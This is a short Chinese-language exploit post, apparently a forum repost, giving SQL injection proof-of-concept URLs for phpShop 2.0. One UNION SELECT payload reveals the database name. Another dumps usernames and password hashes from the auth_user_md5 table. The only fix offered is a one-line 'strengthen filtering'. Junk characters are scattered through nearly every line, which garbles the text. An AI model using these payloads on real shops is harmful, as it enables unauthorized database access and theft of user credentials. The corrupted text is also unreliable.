标题 : phpshop 2.0 SQL Injection Vulnerability2 A" Y( G6 H7 f2 [0 _
9 S) ~- N, D# @$ E
作者 : By onestree. W, e& [( Z" |
下载地址 : http://code.google.com/p/phpshop/downloads/list1 _' E+ t/ U: k1 U9 K
测试地址: windows 7 / ubuntu9 V/ @/ P# z0 _3 } R2 @; K W0 s
; L! F1 [( k3 r/ a
5 {8 I9 U- x0 K; Z1 aSQLi p0c:- |; J, l1 o+ y' I, h
2 C( |* h. F" p" c8 H==================
?' [3 ]2 H& s8 w + _) Z: I& y! B1 B* a; e
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
' [3 l* ^" s$ p' k- g3 N! Qunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
! c7 U9 w, J8 [! y0 J# v
; F- K$ o& G+ Lhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--" _ ~3 n R3 B1 |$ m. v
! z$ ~) B5 J/ J4 t) ?
修复:
4 @0 ^- Y& F0 |+ M3 ?3 P加强过滤7 F8 j4 q3 ?# [
- } }! F9 F9 N
+ h$ M& F* j. ^3 J$ i4 O |